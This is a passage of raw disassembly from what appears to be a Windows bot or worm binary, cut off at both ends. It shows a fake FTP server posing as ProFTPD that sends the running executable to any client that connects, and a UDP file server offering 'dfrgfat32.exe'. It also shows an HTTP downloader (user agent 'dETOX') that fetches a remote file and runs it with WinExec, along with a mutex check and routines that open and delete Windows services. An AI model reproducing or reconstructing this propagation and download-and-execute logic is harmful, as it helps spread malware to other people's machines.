lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call dword_4011E0 ; recvfrom
test eax, eax
jz loc_407EA4
push dword ptr [ebp-20h]
call dword_4011D0 ; inet_ntoa
push eax
lea eax, [ebp-34h]
push 10h
push eax
call sub_409A26 ; _snprintf
add esp, 0Ch
cmp [ebp-33Ch], bl
jnz loc_407E90
cmp byte ptr [ebp-33Bh], 1
jnz short loc_407DB1
push offset aDfrgfat32_exe ; "dfrgfat32.exe"
call sub_409AA2 ; strlen
push ebx
push ebx
push dword ptr [ebp-8]
call sub_409AE4 ; fseek
push dword ptr [ebp-8]
lea eax, [ebp-234h]
mov [ebp-238h], bl
mov byte ptr [ebp-237h], 3
push edi
push 1
push eax
mov [ebp-236h], bl
mov byte ptr [ebp-235h], 1
call sub_409AD8 ; fread
add esp, 20h
lea ecx, [ebp-24h]
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-238h]
push eax
loc_407D95: ; CODE XREF: code:00407E9F�j
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call dword_4011DC ; sendto
jmp loc_407C78
; ---------------------------------------------------------------------------
loc_407DB1: ; CODE XREF: code:00407D3D�j
cmp byte ptr [ebp-33Bh], 4
jnz loc_407E90
mov cl, [ebp-339h]
mov al, [ebp-33Ah]
cmp cl, 0FFh
mov [ebp-238h], bl
mov byte ptr [ebp-237h], 3
jnz short loc_407DEE
inc al
xor cl, cl
mov [ebp-236h], al
mov [ebp-235h], bl
jmp short loc_407DFC
; ---------------------------------------------------------------------------
loc_407DEE: ; CODE XREF: code:00407DDA�j
inc cl
mov [ebp-236h], al
mov [ebp-235h], cl
loc_407DFC: ; CODE XREF: code:00407DEC�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, edi
push eax
push dword ptr [ebp-8]
call sub_409AE4 ; fseek
push dword ptr [ebp-8]
lea eax, [ebp-234h]
push edi
push 1
push eax
call sub_409AD8 ; fread
add esp, 1Ch
lea ecx, [ebp-24h]
mov [ebp-0Ch], eax
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-238h]
push eax
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call dword_4011DC ; sendto
cmp [ebp-0Ch], ebx
jnz loc_407C78
lea eax, [ebp-34h]
push eax
lea eax, [ebp-34h]
push eax
call sub_4091CA
pop ecx
push eax
mov eax, dword_40397C
imul eax, 1Ch
push off_4016E0[eax]
push offset dword_403554
call sub_404C8D
add esp, 10h
jmp loc_407C78
; ---------------------------------------------------------------------------
loc_407E90: ; CODE XREF: code:00407D30�j
; code:00407DB8�j
push dword ptr [ebp-4]
lea eax, [ebp-24h]
push eax
push ebx
push 9
push offset dword_403548
jmp loc_407D95
; ---------------------------------------------------------------------------
loc_407EA4: ; CODE XREF: code:00407D0C�j
push ebx
call dword_401088 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407EAB proc near ; CODE XREF: text:004084A7�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 1
push 2
call dword_4011B4 ; socket
test eax, eax
mov ds:dword_409D18, eax
jnz short loc_407ECA
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_407ECA: ; CODE XREF: sub_407EAB+19�j
push [ebp+arg_0]
mov [ebp+var_10], 2
call dword_401198 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_4011B0 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_409D18
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
setnz al
leave
retn
sub_407EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F03 proc near ; CODE XREF: text:004084B8�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 504h
push edi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_4010A0 ; GetModuleFileNameA
test eax, eax
jz short loc_407F3E
lea eax, [ebp+var_104]
push offset dword_40341C
push eax
call sub_409ADE ; fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jnz short loc_407F42
loc_407F3E: ; CODE XREF: sub_407F03+20�j
xor al, al
jmp short loc_407F8C
; ---------------------------------------------------------------------------
loc_407F42: ; CODE XREF: sub_407F03+39�j
test byte ptr [edi+0Ch], 10h
jnz short loc_407F83
push esi
mov esi, 400h
loc_407F4E: ; CODE XREF: sub_407F03+7D�j
push edi
push 1
lea eax, [ebp+var_504]
push esi
push eax
call sub_409AD8 ; fread
add esp, 10h
lea eax, [ebp+var_504]
push 0
push esi
push eax
push [ebp+arg_0]
call dword_4011A8 ; send
push 1
call dword_40107C ; Sleep
test byte ptr [edi+0Ch], 10h
jz short loc_407F4E
pop esi
loc_407F83: ; CODE XREF: sub_407F03+43�j
push edi
call sub_409AD2 ; fclose
pop ecx
mov al, 1
loc_407F8C: ; CODE XREF: sub_407F03+3D�j
pop edi
leave
retn
sub_407F03 endp
; ---------------------------------------------------------------------------
loc_407F8F: ; DATA XREF: sub_409022+D6�o
push ebp
mov ebp, esp
sub esp, 588h
push ebx
push esi
xor ebx, ebx
push edi
push ebx
push 1
push 2
mov [ebp-1B4h], ebx
mov [ebp-588h], ebx
call dword_4011B4 ; socket
mov esi, offset aFtpdaemon ; "FTPDaemon"
mov edi, eax
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
cmp edi, ebx
push ebx
mov ds:dword_409D68[eax*8], edi
jnz short loc_407FD7
call dword_401088 ; ExitThread
loc_407FD7: ; CODE XREF: code:00407FCF�j
movzx eax, ds:word_409D50
push eax
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call sub_40860A
add esp, 0Ch
test al, al
jnz short loc_408003
push ebx
; ---------------------------------------------------------------------------
db 0FFh, 15h, 88h
code ends
; Section 2. (virtual address 00008000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
text segment para public 'DATA' use32
assume cs:text
;org 408000h
assume es:nothing, ss:nothing, ds:code, fs:nothing, gs:nothing
byte_408000 db 10h, 40h, 0 ; DATA XREF: text:0040C621�o
; ---------------------------------------------------------------------------
loc_408003: ; CODE XREF: code:00407FFA�j
push esi
call sub_409783
lea eax, [eax+eax*2]
push esi
mov dword ptr [ebp-1B4h], 1
mov eax, ds:dword_409D68[eax*8]
mov [ebp-1B0h], eax
call sub_409783
lea eax, [eax+eax*2]
pop ecx
pop ecx
mov eax, ds:dword_409D68[eax*8]
cmp eax, ebx
mov [ebp-4], eax
jnz short loc_408043
push ebx
call dword_401088 ; ExitThread
loc_408043: ; CODE XREF: text:0040803A�j
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
cmp ds:dword_409D68[eax*8], ebx
jz loc_408591
mov ebx, dword_4011A8
loc_408060: ; CODE XREF: text:00408586�j
push 41h
lea esi, [ebp-1B4h]
pop ecx
lea edi, [ebp-588h]
rep movsd
xor esi, esi
lea eax, [ebp-588h]
push esi
push esi
push esi
push eax
mov eax, [ebp-4]
inc eax
push eax
call dword_4011C4 ; select
cmp eax, 0FFFFFFFFh
jz loc_4085A7
xor edi, edi
cmp [ebp-4], esi
jl loc_408571
loc_40809C: ; CODE XREF: text:0040856B�j
push 80h
lea eax, [ebp-284h]
push esi
push eax
call sub_409AB4 ; memset
push 80h
lea eax, [ebp-0B0h]
push esi
push eax
call sub_409AB4 ; memset
add esp, 18h
lea eax, [ebp-588h]
push eax
push edi
call sub_409CDE ; __WSAFDIsSet
test eax, eax
jz loc_408567
push offset aFtpdaemon ; "FTPDaemon"
call sub_409783
lea eax, [eax+eax*2]
pop ecx
cmp edi, ds:dword_409D68[eax*8]
jnz loc_4081C1
lea eax, [ebp-1Ch]
mov dword ptr [ebp-1Ch], 10h
push eax
lea eax, [ebp-1C4h]
push eax
push offset aFtpdaemon ; "FTPDaemon"
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call dword_4011D8 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp-8], eax
jz loc_408567
xor ecx, ecx
cmp [ebp-1B4h], esi
jbe short loc_40814C
lea edx, [ebp-1B0h]
loc_40813C: ; CODE XREF: text:0040814A�j
cmp [edx], eax
jz short loc_40814C
inc ecx
add edx, 4
cmp ecx, [ebp-1B4h]
jb short loc_40813C
loc_40814C: ; CODE XREF: text:00408134�j
; text:0040813E�j
cmp ecx, [ebp-1B4h]
jnz short loc_40816A
cmp dword ptr [ebp-1B4h], 40h
jnb short loc_40816A
mov [ebp+ecx*4-1B0h], eax
inc dword ptr [ebp-1B4h]
loc_40816A: ; CODE XREF: text:00408152�j
; text:0040815B�j
cmp eax, [ebp-4]
jle short loc_408172
mov [ebp-4], eax
loc_408172: ; CODE XREF: text:0040816D�j
push 0Ah
push esi
call sub_409957
pop ecx
pop ecx
push eax
push 2
push esi
call sub_409957
pop ecx
pop ecx
push eax
push offset a220Proftpd1_D_ ; "220 ProFTPD 1.%d.%d Server (ProFTPD Def"...
lea eax, [ebp-384h]
push 80h
push eax
call sub_409A26 ; _snprintf
add esp, 14h
lea eax, [ebp-384h]
push esi
push eax
call sub_409AA2 ; strlen
pop ecx
push eax
lea eax, [ebp-384h]
push eax
push dword ptr [ebp-8]
call ebx ; dword_4011A8
jmp loc_408567
; ---------------------------------------------------------------------------
loc_4081C1: ; CODE XREF: text:004080ED�j
push esi
lea eax, [ebp-284h]
push 80h
push eax
push edi
call dword_4011A4 ; recv
test eax, eax
jg short loc_40822B
mov edx, [ebp-1B4h]
xor ecx, ecx
cmp edx, esi
jbe short loc_40821F
lea eax, [ebp-1B0h]
loc_4081EB: ; CODE XREF: text:004081F5�j
cmp [eax], edi
jz short loc_4081F9
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_4081EB
jmp short loc_40821F
; ---------------------------------------------------------------------------
loc_4081F9: ; CODE XREF: text:004081ED�j
dec edx
cmp ecx, edx
jnb short loc_408219
lea eax, [ebp+ecx*4-1B0h]
loc_408205: ; CODE XREF: text:00408217�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp-1B4h]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_408205
loc_408219: ; CODE XREF: text:004081FC�j
dec dword ptr [ebp-1B4h]
loc_40821F: ; CODE XREF: text:004081E3�j
; text:004081F7�j
push edi
call dword_4011B8 ; closesocket
jmp loc_408567
; ---------------------------------------------------------------------------
loc_40822B: ; CODE XREF: text:004081D7�j
lea eax, [ebp-404h]
push eax
lea eax, [ebp-0B0h]
push eax
lea eax, [ebp-284h]
push offset aSS ; "%s %s"
push eax
call sub_409AF6 ; sscanf
lea eax, [ebp-0B0h]
push offset aUser ; "USER"
push eax
call sub_409AF0 ; strcmp
add esp, 18h
test eax, eax
jnz short loc_40826F
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_40826F: ; CODE XREF: text:00408260�j
lea eax, [ebp-0B0h]
push offset aPass ; "PASS"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408293
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_408293: ; CODE XREF: text:00408284�j
lea eax, [ebp-0B0h]
push offset aSyst ; "SYST"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4082B7
push esi
push 12h
push offset a215UnixTypeL8 ; "215 UNIX Type: L8\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_4082B7: ; CODE XREF: text:004082A8�j
lea eax, [ebp-0B0h]
push offset aRest ; "REST"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4082DB
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_4082DB: ; CODE XREF: text:004082CC�j
lea eax, [ebp-0B0h]
push offset aPwd ; "PWD"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4082FF
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_4082FF: ; CODE XREF: text:004082F0�j
lea eax, [ebp-0B0h]
push offset aType ; "TYPE"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40832D
lea eax, [ebp-404h]
push offset aA_0 ; "A"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_408344
loc_40832D: ; CODE XREF: text:00408314�j
lea eax, [ebp-404h]
push offset aI ; "I"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408351
loc_408344: ; CODE XREF: text:0040832B�j
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_408351: ; CODE XREF: text:00408342�j
lea eax, [ebp-0B0h]
push offset aPasv ; "PASV"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408375
push esi
push 29h
push offset a425PassiveNotS ; "425 Passive not supported on this serve"...
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_408375: ; CODE XREF: text:00408366�j
lea eax, [ebp-0B0h]
push offset aList ; "LIST"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408399
push esi
push 16h
push offset a226TransferCom ; "226 Transfer complete\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_408399: ; CODE XREF: text:0040838A�j
lea eax, [ebp-0B0h]
push offset aPort ; "PORT"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408477
lea eax, [ebp-304h]
push eax
lea eax, [ebp-2C4h]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-284h]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_409AF6 ; sscanf
lea eax, [ebp-2C4h]
push eax
call sub_409A38 ; atoi
mov [ebp-0Ch], eax
lea eax, [ebp-304h]
push eax
call sub_409A38 ; atoi
mov [ebp-8], eax
push 40h
lea eax, [ebp-204h]
push esi
push eax
call sub_409AB4 ; memset
add esp, 34h
lea eax, [ebp-204h]
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
push offset aXX ; "%x%x\n"
push 40h
push eax
call sub_409A26 ; _snprintf
push 10h
lea eax, [ebp-204h]
push esi
push eax
call sub_409AEA ; strtoul
add esp, 20h
mov [ebp-0Ch], eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-14h]
push eax
push offset aS_S_S_S ; "%s.%s.%s.%s"
lea eax, [ebp-484h]
push 80h
push eax
call sub_409A26 ; _snprintf
add esp, 1Ch
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40854F
; ---------------------------------------------------------------------------
loc_408477: ; CODE XREF: text:004083AE�j
lea eax, [ebp-0B0h]
push offset aRetr ; "RETR"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408530
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; dword_4011A8
push dword ptr [ebp-0Ch]
lea eax, [ebp-484h]
push eax
call sub_407EAB
pop ecx
test al, al
pop ecx
jz short loc_408526
push ds:dword_409D18
call sub_407F03
pop ecx
test al, al
push esi
jz short loc_4084CC
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
jmp short loc_4084D3
; ---------------------------------------------------------------------------
loc_4084CC: ; CODE XREF: text:004084C1�j
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
loc_4084D3: ; CODE XREF: text:004084CA�j
push edi
call ebx ; dword_4011A8
inc ds:dword_409F08
lea eax, [ebp-30h]
push eax
push edi
call sub_4085AE
pop ecx
lea eax, [ebp-30h]
pop ecx
push eax
lea eax, [ebp-30h]
push eax
call sub_4091CA
pop ecx
push eax
mov eax, dword_40397C
imul eax, 1Ch
push ds:dword_409F08
push off_4016E0[eax]
push offset dword_4035C8
call sub_404C8D
add esp, 14h
push ds:dword_409D18
call dword_4011B8 ; closesocket
jmp short loc_408552
; ---------------------------------------------------------------------------
loc_408526: ; CODE XREF: text:004084B0�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40854F
; ---------------------------------------------------------------------------
loc_408530: ; CODE XREF: text:0040848C�j
lea eax, [ebp-0B0h]
push offset aQuit ; "QUIT"
push eax
call sub_409AF0 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408552
push esi
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_40854F: ; CODE XREF: text:0040826A�j
; text:0040828E�j ...
push edi
call ebx ; dword_4011A8
loc_408552: ; CODE XREF: text:00408524�j
; text:00408545�j
push 80h
lea eax, [ebp-284h]
push esi
push eax
call sub_409AB4 ; memset
add esp, 0Ch
loc_408567: ; CODE XREF: text:004080D2�j
; text:00408126�j ...
inc edi
cmp edi, [ebp-4]
jle loc_40809C
loc_408571: ; CODE XREF: text:00408096�j
push offset aFtpdaemon ; "FTPDaemon"
call sub_409783
lea eax, [eax+eax*2]
pop ecx
cmp ds:dword_409D68[eax*8], esi
jnz loc_408060
mov esi, offset aFtpdaemon ; "FTPDaemon"
loc_408591: ; CODE XREF: text:00408054�j
push esi
call sub_409783
push eax
call sub_40971A
pop ecx
pop ecx
push 1
call dword_401088 ; ExitThread
loc_4085A7: ; CODE XREF: text:0040808B�j
push esi
call dword_401088 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085AE proc near ; CODE XREF: code:004079B1�p
; text:004084E1�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_4011E8 ; getpeername
test eax, eax
jz short loc_4085D4
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4085D4: ; CODE XREF: sub_4085AE+20�j
push 2
lea eax, [ebp+var_10]
push 4
push eax
call dword_4011E4 ; gethostbyaddr
test eax, eax
jnz short loc_4085FA
push [ebp+var_10]
call dword_4011D0 ; inet_ntoa
push eax
push [ebp+arg_4]
call sub_409AC0 ; sprintf
jmp short loc_408604
; ---------------------------------------------------------------------------
loc_4085FA: ; CODE XREF: sub_4085AE+36�j
push dword ptr [eax]
push [ebp+arg_4]
call sub_409AAE ; strcpy
loc_408604: ; CODE XREF: sub_4085AE+4A�j
pop ecx
mov al, 1
pop ecx
leave
retn
sub_4085AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40860A proc near ; CODE XREF: code:00407B19�p
; code:00407C21�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov [ebp+var_10], 2
call dword_4011B0 ; ntohs
mov [ebp+var_E], ax
and [ebp+var_C], 0
lea eax, [ebp+arg_4]
push 4
push eax
push 4
push 0FFFFh
mov [ebp+arg_4], 1
push [ebp+arg_0]
call dword_4011F4 ; setsockopt
test eax, eax
jnz short loc_408672
lea eax, [ebp+var_10]
push 10h
push eax
push [ebp+arg_0]
call dword_4011F0 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_408672
cmp [ebp+arg_8], 0
jnz short loc_408676
push 0Ah
push [ebp+arg_0]
call dword_4011EC ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_408676
loc_408672: ; CODE XREF: sub_40860A+3C�j
; sub_40860A+50�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_408676: ; CODE XREF: sub_40860A+56�j
; sub_40860A+66�j
mov al, 1
leave
retn
sub_40860A endp
; =============== S U B R O U T I N E =======================================
sub_40867A proc near ; CODE XREF: sub_404360+1BB�p
; code:00405669�p ...
arg_0 = dword ptr 4
push 2
push [esp+4+arg_0]
call dword_4011F8 ; shutdown
push [esp+arg_0]
call dword_4011B8 ; closesocket
retn
sub_40867A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408691 proc near ; CODE XREF: sub_40870A+4B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 7
push offset aHttp ; "http://"
push ebx
call sub_409B02 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4086F6
lea edi, [ebx+7]
push 2Fh
push edi
call sub_409AFC ; strchr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4086F6
push ebx
call sub_409AA2 ; strlen
cmp eax, 100h
pop ecx
jnb short loc_4086F6
push esi
push [ebp+arg_8]
call sub_409AAE ; strcpy
sub esi, ebx
lea eax, [esi-7]
push eax
push edi
mov edi, [ebp+arg_4]
push edi
call sub_409ABA ; memcpy
add esp, 14h
and byte ptr [esi+edi-7], 0
mov ax, 1
jmp short loc_408705
; ---------------------------------------------------------------------------
loc_4086F6: ; CODE XREF: sub_408691+1B�j
; sub_408691+2E�j ...
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
xor ax, ax
loc_408705: ; CODE XREF: sub_408691+63�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408691 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40870A proc near ; CODE XREF: sub_404360+25D�p
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_11C = byte ptr -11Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404310
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 32Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_32C], ebx
mov [ebp+var_224], ebx
mov [ebp+var_4], ebx
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_328]
push eax
push [ebp+arg_0]
call sub_408691
add esp, 0Ch
test ax, ax
jnz short loc_408769
loc_408762: ; CODE XREF: sub_40870A+76�j
; sub_40870A+A0�j ...
xor eax, eax
jmp loc_40890D
; ---------------------------------------------------------------------------
loc_408769: ; CODE XREF: sub_40870A+56�j
push ebx
push ebx
push ebx
push ebx
push offset aDetox ; "dETOX"
call dword_401184 ; InternetOpenA
mov [ebp+var_330], eax
cmp eax, ebx
jz short loc_408762
push ebx
push ebx
push 3
mov eax, offset byte_409CF0
push eax
push eax
push 50h
lea eax, [ebp+var_328]
push eax
push [ebp+var_330]
call dword_401180 ; InternetConnectA
mov [ebp+var_220], eax
cmp eax, ebx
jz short loc_408762
push ebx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_21C]
push ecx
push ebx
push eax
call dword_40117C ; HttpOpenRequestA
mov [ebp+var_228], eax
cmp eax, ebx
jz short loc_408762
push ebx
push ebx
push ebx
push ebx
push eax
call dword_401178 ; HttpSendRequestA
test eax, eax
jz short loc_408762
push offset aWb ; "wb"
push [ebp+arg_4]
call sub_409ADE ; fopen
pop ecx
pop ecx
mov [ebp+var_334], eax
cmp eax, ebx
jz loc_408762
loc_4087F6: ; CODE XREF: sub_40870A+184�j
push ebx
push ebx
lea eax, [ebp+var_32C]
push eax
push [ebp+var_228]
call dword_401174 ; InternetQueryDataAvailable
test eax, eax
jz loc_408894
mov esi, [ebp+var_32C]
add [ebp+var_224], esi
lea eax, [esi+1]
add eax, 3
and al, 0FCh
call sub_409A60
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_338], edi
mov [edi+esi], bl
mov [ebp+var_33C], ebx
lea eax, [ebp+var_33C]
push eax
push [ebp+var_32C]
push edi
push [ebp+var_228]
call dword_401190 ; InternetReadFile
test eax, eax
jz short loc_408894
push [ebp+var_334]
push 1
push [ebp+var_33C]
push edi
call sub_409B08 ; fwrite
add esp, 10h
test eax, eax
jz short loc_408894
push edi
call sub_409A20 ; free
pop ecx
push 0Ah
call dword_40107C ; Sleep
cmp [ebp+var_32C], ebx
ja loc_4087F6
loc_408894: ; CODE XREF: sub_40870A+103�j
; sub_40870A+152�j ...
push [ebp+var_228]
mov esi, dword_40118C
call esi ; dword_40118C
push [ebp+var_220]
call esi ; dword_40118C
push [ebp+var_330]
call esi ; dword_40118C
push [ebp+var_334]
call sub_409AD2 ; fclose
pop ecx
cmp [ebp+arg_8], bl
jz short loc_4088CD
push ebx
push [ebp+arg_4]
call dword_4010AC ; WinExec
loc_4088CD: ; CODE XREF: sub_40870A+1B7�j
cmp [ebp+arg_C], bl
jz short loc_40891A
push 104h
lea eax, [ebp+var_11C]
push eax
push ebx
call dword_4010A0 ; GetModuleFileNameA
push ebx
push [ebp+arg_4]
call dword_4010AC ; WinExec
push 1
lea eax, [ebp+var_11C]
push eax
call sub_408D7F
pop ecx
pop ecx
test al, al
jz loc_408762
mov eax, [ebp+var_224]
loc_40890D: ; CODE XREF: sub_40870A+5A�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_408924
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_40891A: ; CODE XREF: sub_40870A+1C6�j
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_224]
loc_408924: ; CODE XREF: sub_40870A+207�j
lea esp, [ebp-348h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40870A endp
; =============== S U B R O U T I N E =======================================
sub_408939 proc near ; CODE XREF: sub_409022+53�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_4010B4 ; CreateMutexA
call dword_4010B0 ; RtlGetLastWin32Error
cmp eax, 0B7h
setz al
retn
sub_408939 endp
; =============== S U B R O U T I N E =======================================
sub_408956 proc near ; CODE XREF: sub_408FA5+2A�p
arg_0 = dword ptr 4
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push offset aServicesactive ; "ServicesActive"
push ebx
call dword_401014 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_408975
xor al, al
jmp short loc_40899B
; ---------------------------------------------------------------------------
loc_408975: ; CODE XREF: sub_408956+19�j
push esi
push 0F01FFh
push [esp+10h+arg_0]
push edi
call dword_401018 ; OpenServiceA
mov esi, dword_40101C
cmp eax, ebx
jz short loc_408995
push eax
call esi ; dword_40101C
mov bl, 1
loc_408995: ; CODE XREF: sub_408956+38�j
push edi
call esi ; dword_40101C
mov al, bl
pop esi
loc_40899B: ; CODE XREF: sub_408956+1D�j
pop edi
pop ebx
retn
sub_408956 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40899E proc near ; CODE XREF: sub_408D7F+18�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push ebx
call dword_401014 ; OpenSCManagerA
mov esi, eax
cmp esi, ebx
jz short loc_4089E1
push 0F01FFh
push [ebp+arg_0]
push esi
call dword_401018 ; OpenServiceA
mov edi, eax
cmp edi, ebx
jz short loc_4089E4
push edi
call dword_401010 ; DeleteService
test eax, eax
jz short loc_4089E4
mov bl, 1
jmp short loc_4089E4
; ---------------------------------------------------------------------------
loc_4089E1: ; CODE XREF: sub_40899E+1D�j
mov edi, [ebp+arg_0]
loc_4089E4: ; CODE XREF: sub_40899E+32�j
; sub_40899E+3D�j ...
push esi
mov esi, dword_40101C
call esi ; dword_40101C
push edi
call esi ; dword_40101C
pop edi
mov al, bl
pop esi
pop ebx
pop ebp
retn
sub_40899E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089F7 proc near ; CODE XREF: sub_408FA5+42�p
; sub_408FA5+52�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
